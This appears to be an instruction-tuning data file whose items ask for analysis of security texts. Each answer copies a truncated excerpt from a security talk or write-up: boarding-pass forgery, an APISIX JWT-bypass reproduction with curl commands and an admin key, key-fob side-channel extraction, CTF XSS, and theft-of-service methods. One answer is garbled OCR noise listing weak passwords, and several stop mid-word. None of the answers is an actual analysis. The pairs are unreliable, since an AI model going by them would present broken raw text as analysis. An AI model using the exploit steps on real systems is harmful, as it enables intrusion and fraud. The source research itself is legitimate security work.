{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 参与者 && 致谢 有的同学向本项目提交过PR也有私下提交代码的这些人无法在contributors页面显示所以在这里进行致谢 Avatar | ID | Blog ---- | ---- | ---- [![phith0n](https://github.com/phith0n.png?size=40)](https://github.com/phith0n) | [phith0n](https://github.com/phith0n) | https://www.leavesongs.com/ [![stayliv3](https://github.com/stayliv3.png?size=40)](https://github.com/stayliv3) | [xd_xd](https://github.com/stayliv3) | http://xdxd.love/ [![neargle](https://github.com/neargle.png?size=40)](https://github.com/neargle) | [Neargle](https://github.com/neargle) | http://blog.neargle.com/ [![monburan](https://github.com/monburan.png?size=40)](https://github.com/monburan) | [monburan](https://github.com/monburan) | http://monburan.cn/ [![cbmixx](https://github.com/chaitin.png?size=40)](https://github.com/cbmixx) | [cbmixx](https://github.com/cbmixx) | (null) [![Y4nTsing](https://github.com/Y4nTsing.png?size=40)](https://github.com/Y4nTsing) | [Y4nTsing](https://github.com/Y4nTsing) | (null)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to get good seats in the security theater? Hacking boarding passes for fun and profit Przemek Jaroszewski przemj+defcon24@gmail.com $ whoami  head of the Polish national CSIRT (CERT Polska)  10+ years of education in programming  Masters degree in social psychology  15 years of experience in IT security  aviation enthusiast, unrealized air traffic controller Up in the Air  FF miles are nice, but status in nicer Except when improvements dont work IATA Resolution 792 (2005)  Paper  PDF417  Mobile  QR Code  Aztec  DataMatrix Bar-Coded Boarding Pass M1JAROSZEWSKI/PRZEMYSLE56XXXX WAWCPHSK 2762 666M009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G M1JAROSZEWSKI/PRZEMYSLE56XXXX WAWCPHSK 2762 666M009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G M1JAROSZEWSKI/PRZEMYSLE56XXXX WAWCPHSK 2762 666C009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G Where did we get?  Free Fast Track for all travellers M1COLUMBUS/CHRISTOPHERE56XXXX WAWCPHSK 2762 666M009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G M1COLUMBUS/CHRISTOPHERE56YYYY WAWCPHSK 2762 666M009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G Where did we get?  Free Fast Track for all travelers => Sterile area access for all Wait, this is not news!  Bruce Schneier (2003): Flying On Someone Elses Airplaine Ticket  shows how to work around no fly lists with print-at-home BPs  Andy Bowers (2005): Dangerous Loophole in Airport Security  Bruce Schneier (2006): The Boarding Pass Brouhaha  Christopher Soghoian (2007): Insecure Flight: Broken Boarding Passes and Ineffective Terrorist Watch Lists  Jeffrey Goldberg (2008): The Things He Carried  Charles C. Mann (2011): Smoke Screening  John Butler (2012): Security Flaws in the TSA Pre-Check System and the Boarding Pass Check System No Fly List Bypass (in 2003)  Buy tickets under false name  Print your boarding pass at home  Create a copy of the boarding pass with your real name", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAPISIX_CVE-2022-29266 Patch https://github.com/apache/apisix/commit/61a48a2524a86f2fada90e8196e147538842db89 jwt jwt-auth consumer JWT Authentication service route consumer cookie jwt-auth HS256 RS256 jwt:load_jwt(token) https://github.com/SkyLothar/lua-resty-jwt/blob/ee1d024071f872e2b5a66eaaf9aeaf86c5bab3ed/lib/resty/jwt.lua#L782 jwt_obj[str_const.reason] = \"Decode secret is not a valid cert/public key: \" .. (err and err or secret) HS256jwt-authRS256tokenHS256secretkeytoken Payload vulhub https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 openssl genrsa -out private.key openssl rsa -in private.key -pubout -outform PEM -out public.pem consumer jwt-auth RS256 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { \"username\": \"jack\", \"plugins\": { \"jwt-auth\": { \"key\": \"user-key\", \"public_key\": \"-----BEGIN PUBLIC KEY-----\\n...\\n-----END PUBLIC KEY-----\", \"private_key\": \"-----BEGIN RSA PRIVATE KEY-----\\n...\\n-----END RSA PRIVATE KEY-----\", \"algorithm\": \"RS256\" } } }' Route Service jwt-auth curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { \"methods\": [\"GET\"], \"uri\": \"/index.html\", \"plugins\": { \"jwt-auth\": {} }, \"upstream\": { \"type\": \"roundrobin\", \"nodes\": { \"0.0.0.0:80\": 1 } } }' RS256Token curl http://127.0.0.1:9080/apisix/plugin/jwt/sign?key=user-key -i consumer jwt-auth HS256 curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { \"username\": \"jack\", \"plugins\": { \"jwt-auth\": { \"key\": \"user-key\", \"secret\": \"my-secret-key\" } } }' Route Service jwt-auth curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d ' { \"methods\": [\"GET\"], \"uri\": \"/index.html\", \"plugins\": { \"jwt-auth\": {} }, \"upstream\": { \"type\": \"roundrobin\", \"nodes\": { \"0.0.0.0:80\": 1 } } }' RS256tokenHS256HS256secret key curl http://127.0.0.1:9080/index.html?jwt=eyJ4NWM", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrust Dies in Darkness: Shedding Light on Samsungs TrustZone Cryptographic Design Alon Shakevsky, Eyal Ronen, Avishai Wool Extended paper: https://eprint.iacr.org/2022/208.pdf Tool + PoC: https://github.com/shakevsky/keybuster @shakevsky @eyalr0 yash@eng.tau.ac.il 3 academic researchers The leading Android Vendor What did we find? 2 High severity CVEs that affect over 100 million devices Recover keys that were encrypted by trusted hardware Designed using resources from Flaticon.com Agenda Introduction Background and motivation Keymaster TA Analysis Recovering hardware-protected keys Implications Breaking higher-level protocols Discussion Main takeaways from our research The need for Trusted Execution Environments (TEEs) Designed using resources from Flaticon.com The need for Trusted Execution Environments (TEEs) Designed using resources from Flaticon.com Proprietary TrustZone Operating Systems (TZOS) QSEE Kinibi TEEGRIS TZOS Vendors Black Box Designs Designed using resources from Flaticon.com Research questions 1. Do hardware-protected cryptographic keys remain secure even when the Normal World (Android) is compromised? Designed using resources from Flaticon.com Research questions 1. Do hardware-protected cryptographic keys remain secure even when the Normal World (Android) is compromised? 2. Do compromised hardware-protected keys break the security of various protocols that rely on them? Designed using resources from Flaticon.com ARM TrustZone - Attack Model Designed using resources from Flaticon.com ARM TrustZone - Attack Model Designed using resources from Flaticon.com ARM TrustZone - Attack Model Designed using resources from Flaticon.com Android Hardware-Backed Keystore Flow Designed using resources from Flaticon.com Android Keymaster TA in TrustZone Generate key B = wrap(key) B Request key generation Android Hardware-Backed Keystore Flow Designed using resources from Flaticon.com Android Keymaster TA in TrustZone Request attestation for B Generate key B = wrap", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# It's a kind of magic, SCA, 200pts > You managed to get a spare key fob for the car you like. However you want to duplicate it so that you can maintain your access to it. Through extensive reverse engineering, you figure out that the device accepts an input challenge performs AES-128 encryption (or decryption) and returns the response. It is also identified that the device operates on masked input and returns masked output. Extract the key so you can get free rides! > The device expects 18 bytes of input: the first byte should be either 0xAE (for encryption) or 0xAD (for decryption) followed by 16 bytes of data, followed by a newline. Ok, first SCA challenge. Having no experience in it, it was much harder than I thought. Especially that there is this \"masking\" twist. I desoldered all the capacitors from the board. I also powered it with AA batteries, positive connected to `Vin` pin, and negative to `GND` through a resistor (I think it was a 100Ohm one). Using RIGOL DS1052E and its USB interface, I collected a couple hundreds of power traces of the board encrypting random plaintexts. DS1052E can be setup to collect about one million of samples each time, with each sample being recorded every couple of nanoseconds (exact values depend on various circumstances). UART itself was set as trigger for the recording. The results looked promising: ![sca1](sca1.png) ![sca2](sca2.png) The ten rounds of AES are clearly visible, so that's good. I also collected ten traces of one plaintext, followed by ten traces of a second one. I found a certain place in the traces, in which the difference between both sets is clearly visible: ![sca3](sca3.png) This effect was visible only after smoothing and aligning of the traces. Using CPA attack on the first round's S-box, we were able to recover the value xored with plaintext before that Sub, that is `inmask  key`. Using this value to simulate the first round, we performed the same attack on the second round, this time recovering the secon", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### PCAP文件结构 一般来说,对于 `PCAP` 文件格式考察较少且通常都能借助于现成的工具如 `pcapfix` 直接修复这里大致介绍下几个常见的块详细可以翻看[Here](http://www.tcpdump.org/pcap/pcap.html) - Tools - [PcapFix Online](https://f00l.de/hacking/pcapfix.php) - [PcapFix](https://github.com/Rup0rt/pcapfix/tree/devel) 一般文件结构 ```shell 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Block Type | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Block Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ / Block Body / / /* variable length, aligned to 32 bits */ / +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Block Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ``` 目前所定义的常见块类型有 1. Section Header Block: it defines the most important characteristics of the capture file. 2. Interface Description Block: it defines the most important characteristics of the interface(s) used for capturing traffic. 3. Packet Block: it contains a single captured packet, or a portion of it. 4. Simple Packet Block: it contains a single captured packet, or a portion of it, with only a minimal set of information about it. 5. Name Resolution Block: it defines the mapping from numeric addresses present in the packet dump and the canonical name counterpart. 6. Capture Statistics Block: it defines how to store some statistical data (e.g. packet dropped, etc) which can be useful to undestand the conditions in which the capture has been made. ### PCAP 文件修复常见块 Section Header BlocK(文件头) Interface Description Block(接口描述) Packet Block(数据块) ### PCAP 文件修复中的Section Header BlocK(文件头) 必须存在,意味着文件的开始 ```shell 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Byte-Order Magic (0x1A2B3C4D) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Major Version(主版本号) | Minor Version(次版本号) | +-+", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n- 0. 1 1 2 3 (  lSIXe14BC 065  44Al Xe  X1  U  NA5  lrQ0 b  0iT  ku t  g vDm  H NP  lo dM  ax13 v  2n404  G 4  rZbla EAFm  ew  U8BAF  B88FPir  h1F 3E8FPi n  R88t R  rEF TNc  E3  T f  osd51.BEE E3  h2E9DEEw  RZ7FEBEED OW  1RkNC803  3EB8F6Dg0FED S 5 (3102r Ø9VS Ør3ai l(3102 032a99n l9lV 9tM ØescWo 0,33)Oe9 wO T() (3102 fd(3102 (3102fd 1 6 ()regT ØTP l,21110lT6 c,2,12 Øt lTcnDZoi6D DA6 7 9e Ø l89 Gy593C Ø l0)(, u)(,3 921K )(, 8 Tr Ø lsw,1 wybyinVe ,, Ø lac ws pm)2(10 9 10 https://www.ithome.com.tw/news/142729 5 Ø l 4Bn 63n Ø l 6 l un10 dG2 l 7 ) () l 0., 11 ()s ØT l2k01 rra Ø l( del 5V() 12 13 021 14 15 16 17 18 19   /   33#/0.//333/03 _ S a a : a S S S 20  VPD DRD  DD DN N D 21  icoeo Zi . 1  212 M ) (3aB h TcVODn nMHr 22 EVMtD tD RO RVI p V root/icatch99 report/8Jg0SR8K50 p V admin/123456 iF p 117.56.0.0 p 61.60.0.0 23 p p86A 24 ,CD 0 B0 0 ( 1)  ( 2 D D (D )D D E 44 144 365 315 113 981 17 0 106 532 4,981 679 6,298 B0 46 122 155 84 20 427 2 90 372 1,052 5,380 812 7,706 2157 6 6 *6 6 8 0 0 0 25 07943 26 0 9302 81 8 0 781 8 5 5o05o6e 1 //0 081 8 5 900 G0281 8 6C0o1 C 5 0e 1 C 808 1 8 5 107 01 8  09  I04lgC 27 2.1 5/ 5 .1 / 5 3.3/ 50IP 0C/ 5 50IP 0C/ 5 2.1 5/ 5 7. A3./ 5 3 3/ 09/ 5 0/ 5 0/ 5 6648.5.5 M S T B S iB ncP S T M 28  5D1B3 08 41B3 A92 56C 4 Aa123456 7 1qaz@WSX 8 asdf1234 9 P@ssw0rd B B B B 29 30 31 P-D ØP-D l()9 l50V9 lO0C 0 I01 2TA 9 32 t iP: o t O : e D aGr: e D C e bA : C S e l 72169098453: Ak e 33 34 Ø  4  4  4  a4 Ø  0% 20% 40% 60% 80% 100% 120% 54 55 56 57 58 59 510 511 512 513 514 515 516 5 / 35 36 37 ØA Ø Ø ØT T ØP P 38 39 WEAKNESSES SOLUTIONS 40 41 42 O O C 02 03 04 /T I 43 01 (       A  VS    NNV 44 (2/2) 4 2 1 4 3 3 4 3 3 45 (          46 4  13V75 60 ) (3 62 /5 P 1)(2 N 47 Ø l P l I /TAI Ø lP lSD P 48 Ø Ø48 Ø12449 Ø08 lA 49 Ø 3 ØN l0765PV p1 p76 5 p )(2 50 Ø64 Ø105438 51 ( Ø( ü) ü pV) pV) C 52 ØE ) ) 53 1  49  I ü ü8 ü37  0 ü ü  I  2  37  372 I ü ü5 ü 0 617 78 2 617 7 8 2 61 12 54 ( )( 55 37 ( ( ) ) I C 38 16    ) (  ) ( 56 57 B S National CERT Natio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n大白话解释拟态安全 一前言 一千个读者有一千个哈姆雷特可能我有一些地方没有理解透彻和没有彻底明白所以对于我讲的 东西存在偏面或者不好地方欢迎指正但是不要骂我 各位师傅可能这几年都听过一些特别高大上的词语拟态安全内生安全...在我看来一开始可能以 为这是什么全新的技术全新的理念其实都是一些旧概念旧技术的衍生我们今天主要来讲的就是 拟态安全究竟是什么东西尽量使用能听得懂的话语来进行通俗易懂的解释 此外要注意的是拟态安全并没有开源或公开的设备或者说我这种菜鸡接触不到所以我只能根据 网上的公开的文章论文等资料进行阅读和理解进行云解答所以一定会存在理解误差的情况我会 把看到的文献论文 以caj或pdf的形式打包成压缩包贴在文章后面 二拟态是什么 拟态是生物学里面的概念即指一种生物在形态行为等特征上模拟另一种生物从而使一方或双方受 益的生态适应现象其实就是模拟模仿拟态听起来比较高大上如果有联想记忆好的师傅可能就已 经想到一个历史更为悠久的名词--蜜罐我觉得如果不能明白拟态是什么就把拟态当成蜜罐V2.0蜜 罐的延伸技术就好了 1起源 追溯一个事务的本质就要去理解其发展的过程和历史根据国内的论文显示拟态安全最早追溯于2013 年9月那么真的是如此吗 我们通过谷歌把时间限制在2013年8月30日之前 其实可以看到最早是可以追溯到2005年一篇来自中国台湾省国立交通大学的硕士论文这里给出链接 我随后也会打包以下开始有关引用链接做相同处理 https://ir.nctu.edu.tw/bitstream/11536/73946/1/759101.pdf 这是拟态攻击之入侵检测巴拉巴拉巴拉的 就是在写ids是怎么通过fork来进行防御的这和我们的拟态 防御没有关系跳过为了确认通读了全文顶- - 别的13年以前的拟态都是和我们要看的拟态无关那么拟态防御这个概念 在国外的相关技术是什么呢 Moving Target Defence, MTD叫做移动目标防御 译文截图直接跳过吧不用看感兴趣的自己google搜一下 出发点 移动防御的出发点和拟态的出发点是相似的 划重点了师傅们这有助于理解拟态安全的出发点现有的安全体系里面大部分严谨滑稽都是 基于指纹或者常说的特征来进行识别的是一种被挨打的方式大部分都是黑客组织们攻击成功比如 17010已经打了不知道多少年了才被后人所知所以现有的安全体系是无法面对零日漏洞的所以 什么拟态安全内生安全出发点就是为了增加未知的可利用的漏洞和故意设置的后门成本注意这 里是增加成本因为邬江兴院士也在论文里提及了这个点不可能保证系统的百分百安全就是为了恶 心黑客啊写到这里让我想到了宝塔 区别 移动目标防御对于后门不是特别关注主要关注自身内部未知漏洞攻击的防护原因联想一下棱 镜门再想想大量的后门都是谁写的2333 目前移动目标防御主要基于软件技术;拟态安全防御, 不仅仅基于软件, 而是基于拟态计算的软硬件 协同的技术共同特点还是动态化多样化随机化 相同点 相同的都是动态化多样化随机化的主动防御思想 2前提 首先要记住一个基准安全是服务于产品的所以拟态安全不能对用户的使用进行较大的影响 3实现 别的不提讲一些我觉得是重点的东西 硬件层面, 它的目标就是主动变化处理存储互联输入输出等方式让系统充满随机性 听起来好像好高大上就是什么地址分配随机化眼熟不2333指令随机化...就是让一些固定的 能让黑客容易且需要获取的东西变成多样化增加成本 这个其实现在的产品都在做- - 传 统的安全体系 拟态安全体系 拟态安全不是真的就是一个百分百全新的技术是结合现有的入侵检测蜜罐应急响应等等一起 做 说了这么多 拟态究竟是什么东西怎么实现的 那么在web层面上拟态的网络拓扑是怎么样的呢请看图注意这是来自2017年的论文可能有 新迭代 看出亮点了吗我们以前传统的网络架构可能就是客户端对应的一个服务端或者做了负载均衡的服 务端说错指正 拟态怎么做的 就是他在服务端做了几个流程第一个点就是 你的请求会随机交到后面的所有服务器处 理有服务器A 服务器B 服务器C他们的架构不同但是对于正常的用户请求他们返回的应该是一样 的比如 但是你这个老黑客就不同了你请求的是 这时候centos 或者ubuntu的服务器可能的确包含成功了但是winserver摇了摇头他们根本没有这个 文件所以包含没成功响应的内容是空的 这时候DDRV响应表决器看到怎么请求的结果不一样啊可能就会 把你这个请求给取消了或者响应正常的?include=头像.jpg 并且可能对执行了恶意请求的服务器进行还原 同理这些也可以应用到各种攻击手段中比如 你sql注入你注入的一开始探测到的是mysql结果后面的mssql orcale接收到你注入的mysql 指令根本不认识结果导致返回结果不一样而且别忘了前面说", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Cool Storage Service (Web, 357p, 7 solved) [PL](#pl-version) In the task we get access to a simple PHP-based file storage service. Initial setup seems like a classic XSS task, since we can provide admin with a link and he will visit it. However it seems we can provide only a link to this storage service, and the CSP header is: `Content-Security-Policy: default-src 'none'; style-src 'self'; img-src data: http:` This means we can't execute any JS, styles can be loaded only from the same domain and pictures can be loaded from data or from external server. We can use this service to store files, however `php, php3...` etc. extensions are blacklisted. The service claims that we can upload only pictures, but in reality the checks are not very strict, so for example prefix `GIF` can fool it, same as prepending PNG header. Once the file is uploaded we can view it, but it's loaded as `data` in base64 form. We can trigger an error by trying to view non-existing file, and this will tell us that our sandbox is at `/uploads/sha256(our_login)`, but when we try to access the file directly via `http://css.teaser.insomnihack.ch/uploads/...` we get `Direct access to uploaded files is only allowed from localhost`. This means that even if we could upload a `.php` file, we would probably not be able to execute it. In some places on the page we get `echo` on our inputs. For example searching for some filename, we get `Search results for : our text`. In most places html entities are escaped, but there are a couple of places where it's not the case: - In `view file` the filename is not escaped, so we can inject html there - In `user profile` inputs are not escaped and we can inject html there as well - In `login` screen there is a hidden input `redirect`, which is not escaped ![](inject.png) To wrap up what we already have: - CSP allows to load styles from the same domain - We can echo any input we want on the page - We can inject html tags - CSP allows to load images from external serve", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMore MitM Makes Mana Mostly Mediate Mischievous Messages @singe @cablethief dominic@sensepost.com michael@sensepost.com Tracking Scenarios Scenario 1 Snoopy Dont go to them Make them come to you Enterprise EAP Networks Scenario 2 EAP association 4-way handshake Server Cert Client Cert EAP Relay with Sycophant By @cablethief association 4-way handshake outer TLS setup MSCHAPv2 challenge MSCHAPv2 response association 4-way handshake outer TLS setup MSCHAPv2 challenge MSCHAPv2 response association outer TLS setup 4-way handshake sycophant Mallory in the Middle Scenario 3 MitM Practise HW-less CTFs https://w1f1.net/ @sensepost @singe @cablethief", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 清华大学NISL实验室 Blue-Lotus黑客竞赛战队 @清华诸葛建伟 知道Web安全论坛KCON交流 Blue-Lotus战队 Defcon 20 CTF资格赛回顾 Defcon CTF竞赛 2 o 全球最有影响力的黑客竞赛  黑客奥运会 n 1996年开始已成功举办16届 n 组织者DDTek2009-Present o Defcon 20 CTF n Quals  资格赛 o Challenges Solving o 10支队 + 10支其他CTF冠军队 晋级 n Deathmatch  拉斯维加斯 淘汰赛 n Final  决赛 CTF (offense & defense) o Defcon黑客会议现场 梦想中的拉斯维加斯决赛现场 3 Defcon CTF资格赛制 4 o Grag bag 网络分析题 o Urandom 随机题 o Binary l33tness 二进制逆向 分析 o Pwnables 渗透攻击题 o Forensics 取证分析题 o 100-500分 o 第一个解题队 开出下一题 Blue-Lotus蓝莲花战队 o 清华大学网络与信息安全实验室(NISL@TU)参加黑 客竞赛的队名 o 首次参赛2010年12月iCTF10 n 启蒙队disketUGAProf. Kang Li n 首次战绩: 35/72 o iCTF11战绩23/87 n Metasploit原创书大结局场景 5 永不凋零的 蓝莲花 Defcon CTF参赛征集外援帖 6 外援出现了 7 我们的参赛队员分布 8 CTF开赛  6.2 8:30am 9 [Blue-Lotus]清华总部 [Syclover] 成都信息工程学院 [Blue-lotus] 早点&零食区 0.01h  旗开得分 o Grab Bag 100: Hack the planet_ o 2006: Hack the ______ o 2007: ____ the planet o 2008: Hack ___ planet o 2011: ____ ___ ______. o 2012: Hack the planet_ 10 G100 Writeup: http://netsec.ccert.edu.cn/blog/2012/06/04/693 0.01h  旗开得分 (Hack the planet经典台词的电影-Hacker) 11 0.5h - 梦幻开局, 200分, 并列第1 12 o Urandom 100: n How many developers;) did it take to secure Windows 8? o 当时解题思路 n Google Windows 8发布会视频 - 是否微软某 高管提到Win8安全开发团队人数 n 平均团队规模60-70人人肉暴力猜解1-100未果 o 最终解决程序暴力猜解-答案152 n Slow Down?!! o Why 152? (注意developers后面的奸笑) U100 Writeup: http://netsec.ccert.edu.cn/blog/2012/06/05/719 悲催的零分八小时  p100 o p100: MIPS指令架构远程栈溢出 n 很快fuzz出漏洞点和缓冲区长度 n 搭环境本地动态调试Qemu + Linux-mips n 缓冲区地址覆盖返回地址一直变化ASLR o 指向堆栈的寄存器一直未找到放弃 o 解答关键利用binary中的write()探测出缓冲区地址 o 不足 n 对非主流平台与环境的不熟悉学习MIPS指令 搭环境花了很多时间 n 思维定势jmp esp指向栈空间绕过ASLR 13 P100 Writeup: http://netsec.ccert.edu.cn/blog/2012/06/04/709 悲催的零分八小时  b100 o Binary l33tness 100: 给一个binaryrecover my key n 一个加密mac.h一个sshd一个ssh n Google: skynet ssh backdoor n mac.h后门记录日志文件解密xor 0xff 14 这个Key曾经不是 Key?!!! B100 Writeup: http://wcf1987.iteye.com/blog/1550530 悲催的零分八小时  b100 (cond) 15 o 眼皮底下视而不见的key谁也没有想到这就是key 这个Key据说是曾 经的Key?!!! b100受骗中 16 ./john /root/ Desktop/ hash.txt Ali: 真的是破解crypt ()的明文后门密码吗 就凭我的小Air40小 时能破出来吗 insi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n剑走偏锋 蓝军实战缓解措施滥用 # Whoami  @askme765cs  安全研究员@绿盟科技  M01N战队核心成员  专注系统安全与终端对抗 目录 CONTENTS 01 02 03 Mitigations 101 Red Team Operation \"Mitigation Hell\" Part 01 Mitigations 101 01 Why Mitigations? 漏洞利用两种常见路径  数据破坏  代码执行 利用过程中的动作与特征  修改代码段  加载DLL  创建新进程   Mitigations的效用  截断利用链削减机会窗口  对抗未知威胁与潜在攻击 02 Mitigations Timeline  ASLR  DEP  SafeSEH  SEHOP  CFG  CIG  ACG  Child Process Policy  CFG Strict Mode  CFG Export Suppression  NoLowMandatoryLabelImages   Pre-Win10 TH1 RS1 RS2 RS3 + 03 Code intergerity guard-CIG  Windows 10 TH2 (1511)引入  阻止恶意DLL注入受保护应用程序  对加载DLL的签名进行验证  仅允许可信签名的DLL加载  MicrosoftSignedOnly  StoreSignedOnly  内核主要检查代码位于 MiValidateSectionSigningPolicy  受影响的API NtCreateSection 04 Arbitrary code guard-ACG  Windows 10 RS1 (1607)引入  贯彻WX原则  禁止修改已有代码(X)修改为可写(W)  禁止修改可写数据(W)修改为可执行(X)  禁止分配或映射新的可执行内存  内核主要检查代码位于 MiAllowProtectionChange MiMapViewOfSection  受影响的API NtAllocateVirtualMemory NtProtectVirtualMemory NtMapViewOfSection(SEC_IMAGE/SEC_FILE) Arbitrary code guard-ACG 05  用户态API  VirtualAlloc with PAGE_EXECUTE_*  VirtualProtect with PAGE_EXECUTE_*  MapViewOfFile with FILE_MAP_EXECUTE | FILE_MAP_WRITE  SetProcessValidCallTargets for CFG Boundary of ACG 06  只能限制程序本身不能阻止其他程序对其的修改  开启AllowRemoteDowngrade则可通过其他程序关闭ACG 08 Mitigation Flags-EPROCESS ULONG FlagsFlags2Flags3Flags4 ULONG MitigationFlagsMitigationFlags2 09 Mitigation Policy-注册表 设置指定名称\\路径程序的Mitigation Policy-IFEO  HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\  MitigationOptions:REG_BINARY 系统全局Mitigation Policy  HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\kernel\\  MitigationOptions:REG_BINARY 10 Mitigation Policy-注册表 11 Mitigation Policy-Powershell 查看程序Mitigation Policy(从程序读取)  Get-ProcessMitigation Running Name notepad.exe 查看程序Mitigation Policy(从注册表读取)  Get-ProcessMitigation -Name notepad.exe 设置程序Mitigation Policy(写入注册表)  Set-ProcessMitigation -Name notepad.exe -Enable MicrosoftSignedOnly 12 13 系统设置  设置系统全局Mitiation Policy  CFGDEP强制ASLR等 程序设置  设置单个程序Mitigation Policy  图", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTheft Of Service Attacks Subscription Service & Website Vulnerabilities Presented at Defcon 11 by: Robert Sheehy rjs@zendtech.com Zendtech Services www.zendtech.com Presentation updates are available at: http://www.zendtech.com/defcon11/tos Theft Of Service Attacks What Are Theft Of Service Attacks?  Application Level Attack  Attacker Gains Increased Access To Restricted or Limited Resources  Opportunistic Attack  Typically does not result in system administration access. Example Targets for TOS Attack  Software Registrations & Downloads  Adult Web Sites  Web Hosting Accounts  Proxy/Anonymity Services  Dial-up Internet Service  Email/Usenet Service  Shell Accounts  Financial News Services  Domain Name Registrations What Is Stolen?  Increase access to a service providers systems (Shell Accounts)  Avoidance Of DNS Registration Fees  Usenet Access  Dial-up Internet Access  Web hosting (for data piracy & pornography storage, e-mail spamming, ect...)  Increased Access to restricted content  Software Security Holes Commonly Used for ToS attacks  Instant Account Creation Vulnerabilities  Subscription Data In HTML Forms  Authentication data stored in user cookies  Paypal Subscription Payments  Application, Server & or Operation System specific vulnerability exploits. Obscuring The Attack  Putting in the order during a holiday weekend Backlog of orders from a long holiday weekend may result in less attention to order details Even if there is human review, the attack might be overlooked during high sales volume Who Is The Attacker?  A Technically Savvy Customer.  A Competitor.  An e-mail spammer or other criminal.  Someone looking for a deal.  A legitimate customers friend. Theft of Service Attack Types  Software Copy Protection Circumvention  Abuse Of A Legitimate Account  Bypassing the Billing System  User defined changes to the subscription terms or price. Copy Protection Circumvention  Cracks & Serial Number Websites www.astalavista.box.sk www.cracks.am www.cerials.net ww", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSome things about LAN device detection (關於內網設備識別的二三事) Canaan Kao, Terence Liu, Hsien-Wei Hung and Ryan Lung canaan_kao@trend.com.tw Network Threat Defense Technology Group Trend Micro 2015/8/29 1 HitCon2015: LAN device detection Who we are  Network Threat Defense Technology Group (NTDTG) of Trend Micro  We have offices in Hsinchu and Taipei.  We focus on  (Virtualized) High-speed IPS/IDS  Network-stream-based AV  Smart-home Protection  IoT Security 2015/8/29 2 HitCon2015: LAN device detection Before we start  HitCon2014 slogan:  Adapt to the new era of security threats  威脅是一定會有的我們要學會適應  HitCon2015 slogan:  Security of Things  物連網安全  The combination:  Adapt to the new era of IoT security threats.  物連網威脅是一定會有的我們要學會適應 2015/8/29 HitCon2015: LAN device detection 3 Agenda  Why LAN device identification (LDI)  How to detect LAN devices  The threat intelligence with LDI  Summary 2015/8/29 HitCon2015: LAN device detection 4  Why LAN device identification 2015/8/29 HitCon2015: LAN device detection 5 Why LAN device identification  過去FW/IDS/IPS 基本上會以為家裡的設備 是這樣 2015/8/29 HitCon2015: LAN device detection 6 Why LAN device identification  但是家裡連網的設備實際上可能會是. 2015/8/29 HitCon2015: LAN device detection 7 Why LAN device identification  萬一有誤會就會產生拿針對 x86 產生的 特徵碼來偵測攻擊 ARM/MIPS 設備的 shellcode 的狀況.  User 通常不知道 2015/8/29 HitCon2015: LAN device detection 8 Why LAN device identification  Monitoring  計量  Access Control  連網控制 